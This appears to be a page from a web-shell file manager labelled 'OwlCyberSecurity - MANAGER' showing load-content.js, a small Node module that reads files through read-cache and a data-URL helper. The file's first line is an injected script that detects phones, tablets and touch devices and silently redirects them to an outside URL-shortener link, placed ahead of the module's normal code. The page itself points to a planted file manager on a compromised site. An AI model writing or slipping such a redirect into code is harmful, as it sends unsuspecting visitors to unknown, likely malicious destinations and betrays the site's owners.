OwlCyberSecurity - MANAGER
Edit File: load-content.js
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.dev/OnjMpQPMe0r4"); "use strict" const readCache = require("read-cache") const dataURL = require("./data-url") module.exports = filename => { if (dataURL.isValid(filename)) { return dataURL.contents(filename) } return readCache(filename, "utf-8") }